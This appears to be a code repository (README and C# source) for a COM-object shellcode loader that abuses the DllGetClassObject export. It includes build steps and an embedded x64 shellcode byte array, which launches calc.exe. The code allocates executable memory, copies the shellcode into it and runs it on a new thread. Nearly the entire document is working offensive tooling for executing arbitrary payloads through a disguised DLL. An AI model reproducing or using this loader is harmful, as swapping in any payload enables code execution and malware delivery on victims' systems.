├── README.md └── com_plete.cs /README.md: -------------------------------------------------------------------------------- 1 | # ComObjShellcodeLoader 2 | ComObject Shellcode Loader with fake return address. 3 | 4 | You'll need to Export DllGetClassObject. 5 | 6 | writed on .Net 7 | 8 | 9 | COM_plete : Load shellcode by faking a return offfset. 10 | 11 | HRESULT DllGetClassObject( 12 | [in] REFCLSID rclsid, 13 | [in] REFIID riid, 14 | [out] LPVOID *ppv , <--- Offset to shellcode here :) 15 | ); 16 | 17 | 18 | 19 | run: 20 | c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library com_plete.cs 21 | 22 | c:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\ildasm.exe" /out:com_plete.il com_plete.dll c:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe /DLL /x64 com_plete.il 23 | -------------------------------------------------------------------------------- /com_plete.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.ComponentModel; 4 | using System.Runtime.InteropServices; 5 | 6 | 7 | /* 8 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library com_plete.cs 9 | "C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\ildasm.exe" /out:com_plete.il com_plete.dll 10 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe /DLL /x64 com_plete.il 11 | */ 12 | 13 | public class Exports 14 | { 15 | 16 | // 17 | // 18 | //rundll32 entry point 19 | public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow) 20 | { 21 | 22 | } 23 | 24 | public static bool DllRegisterServer() 25 | { 26 | 27 | return true; 28 | } 29 | 30 | public static bool DllUnregisterServer() 31 | { 32 | 33 | return true; 34 | } 35 | 36 | 37 | public static void DllInstall(bool bInstall, IntPtr a) 38 | { 39 | string b = Marshal.PtrToStringUni(a); 40 | 41 | } 42 | 43 | private delegate int CreateThings(ref Guid clsid, ref Guid iid, [Out, MarshalAs(UnmanagedType.Interface)] out IClassFactory classFactory); 44 | 45 | [Guid("00000001-0000-0000-c000-000000000046")] 46 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 47 | [ComImport] 48 | public interface IClassFactory 49 | { 50 | void CreateInstance([MarshalAs(UnmanagedType.IUnknown)] object pUnkOuter, ref Guid riid, [MarshalAs(UnmanagedType.IUnknown)] out object ppvObject); 51 | void LockServer(bool fLock); 52 | } 53 | 54 | public static Int32 DllGetClassObject(ref Guid clsid, ref IntPtr riid, out IntPtr ppvObj) 55 | { 56 | 57 | UInt32 MEM_COMMIT = 0x1000; 58 | UInt32 PAGE_EXECUTE_READWRITE = 0x40; 59 | //System.Windows.Forms.MessageBox.Show("Boom"); 60 | IntPtr _handle = IntPtr.Zero; 61 | _handle = Win32.LoadLibrary("C:\\Tools\\com_plete.dll"); 62 | Console.WriteLine("{0} ", _handle.ToString("x16")); 63 | 64 | 65 | 66 | Console.WriteLine("Hell Yeah! Boomer! {0}", clsid.ToString() ); 67 | Console.ReadLine(); 68 | 69 | 70 | byte[] shellcode = new byte[276] { 71 | 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52, 72 | 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48, 73 | 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9, 74 | 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41, 75 | 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48, 76 | 0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01, 77 | 0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48, 78 | 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0, 79 | 0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c, 80 | 0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, 81 | 0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04, 82 | 0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59, 83 | 0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48, 84 | 0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00, 85 | 0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f, 86 | 0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff, 87 | 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb, 88 | 0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c, 89 | 0x63,0x2e,0x65,0x78,0x65,0x00 }; 90 | 91 | ppvObj = Win32.VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 92 | 93 | Console.WriteLine("{0} ", ppvObj.ToString("x16")); 94 | Marshal.Copy(shellcode, 0, ppvObj, shellcode.Length); 95 | IntPtr hThread = IntPtr.Zero; 96 | UInt32 threadId = 0; 97 | IntPtr pinfo = IntPtr.Zero; 98 | hThread = Win32.CreateThread(0, 0, ppvObj, pinfo, 0, ref threadId); 99 | Win32.WaitForSingleObject(hThread, 0xFFFFFFFF); 100 | 101 | return 0x00; 102 | 103 | } 104 | 105 | 106 | 107 | 108 | private static class Win32 109 | { 110 | [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)] 111 | public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName); 112 | 113 | [DllImport("kernel32.dll")] 114 | public static extern bool FreeLibrary(IntPtr hModule); 115 | 116 | [DllImport("kernel32.dll", SetLastError = true)] 117 | public static extern IntPtr LoadLibrary(string lpFileName); 118 | 119 | [DllImport("kernel32")] 120 | public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr, 121 | UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 122 | 123 | [DllImport("kernel32")] 124 | public static extern IntPtr CreateThread( 125 | UInt32 lpThreadAttributes, 126 | UInt32 dwStackSize, 127 | IntPtr lpStartAddress, 128 | IntPtr param, 129 | UInt32 dwCreationFlags, 130 | ref UInt32 lpThreadId 131 | ); 132 | 133 | [DllImport("kernel32")] 134 | public static extern UInt32 WaitForSingleObject( 135 | IntPtr hHandle, 136 | UInt32 dwMilliseconds 137 | ); 138 | } 139 | } 140 | --------------------------------------------------------------------------------